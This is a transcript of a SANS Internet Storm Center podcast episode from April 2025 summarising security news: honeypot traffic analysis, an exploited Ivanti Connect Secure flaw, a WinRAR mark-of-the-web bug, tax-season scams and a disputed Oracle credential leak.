Hello and welcome to the Friday, April 4th, 2025
edition of the SANS Internet Storm Center's Stormcast. My
name is Johannes Ullrich and today I'm recording from
Jacksonville, Florida. Today we got another diary from one
of our undergraduate interns, Gregory Weber, did talk about
while analyzing URLs collected by honeypots and how to
identify malicious traffic and distinguish it from normal
traffic to a web application. Of course, honeypots, by
definition, really only get malicious requests. So Gregory
did compare it to data from a normal website, did some
frequency analysis on it, and actually came up with a model
that looks reasonably good in distinguishing attacks from
non-attacks. I think it still needs a little bit of
refinement and maybe more data really to validate it well,
but it's an interesting approach and there, of course,
is a lot of work happening currently doing sort of some
more automated log analysis, automated intrusion detection,
using some of these machine learning techniques. And the
next story falls in the category, never underestimate
the creativity of a sophisticated attacker. In
this example, it's a critical vulnerability in Ivanti
Connect Secure. It was patched in February. It's a buffer
overflow, but exploitation is quite constrained for that
buffer overflow. So Ivanti initially assessed that this
particular vulnerability is not exploitable. Well, they
were proven wrong now, apparently, by some actor that
may be associated with some Chinese state actors.
According to Mandiant, who wrote about it, it looks like
they reversed the patch, a very common technique, of
course, to figure out what the exact vulnerability was. And
yes, then came up with an exploit that was applicable,
even though these constraints, of course, still applied.
Interesting blog post. Apparently, these attacks
started in mid-March. And as of today, Ivanti also
disclosed that this vulnerability has actually
been exploited. And yet another mark of the web
vulnerability, this time in WinRAR. So like all of these
decompression unpacking style programs, well, if the
original file was downloaded from the web, they have to
apply this mark of the web to all the files that they're
expanding. WinRAR usually does that, but apparently doesn't
do it correctly if there are sim links involved. And that's
the vulnerability was addressed here. Not a huge
deal, I think, but certainly something that you do want to
update, given that this is a relatively popular software.
And well, it's already sort of a week into April almost. With
that, we are getting close to the tax filing deadline in the
U.S., April 15th. Microsoft released a timely warning here
that, well, they're seeing, of course, the usual number of
tax-related scams. And definitely something that you
do want to share with colleagues, particular less
technical colleagues, what is being done here right now.
Personally, I've actually not seen a lot. I don't think any
really so far this year. But the typical things are fake
tax form, download sites, QR codes being used to trick
users into going to malicious sites. Also, be a little bit
careful as to what websites you're using for tax filing
services. Remember, I think it was two years ago, we found
like e-file.com, for example, being compromised around tax
filing season. So definitely go with name brand websites
that you have used in the past that already have your data.
And so far, if they're compromised, well, your data
is lost anyway. But definitely be a little bit careful here
who you are using in order to file your tax. And with that,
giving them a lot of your personal information. And
talking about trust and breaches, Oracle now
apparently has notified some of its customers that their
login credentials may have been leaked. They say this is
associated with an older system. And the data that was
actually being leaked here was not current data. Now, the
group that actually leaked the data has disputed that. Again,
this comes back down to how much do you trust your cloud
providers? Because in the end, that's what cloud is all
about. You can't really verify their information that they're
giving you. So you're trusting that they're giving you the
right, correct information to make sound decisions with.
Assume something happened here. But of course, we still
don't exactly know what and what the extent is. And yes,
be ready that Oracle may notify you in private, even
though their public statements at this point don't really say
much about this particular breach. Well, that's it for
today. If you've got a minute, please leave a good review on
any of the podcast sites where you're downloading this
particular podcast. From subscribe, of course, to
automatically be offered any new episodes being released.
Remember, we also have like Alexa, for example. You can
get the podcast via that. We have YouTube and a bunch of
other channels where we do offer this podcast. Thanks and
talk to you again on Monday. Bye.
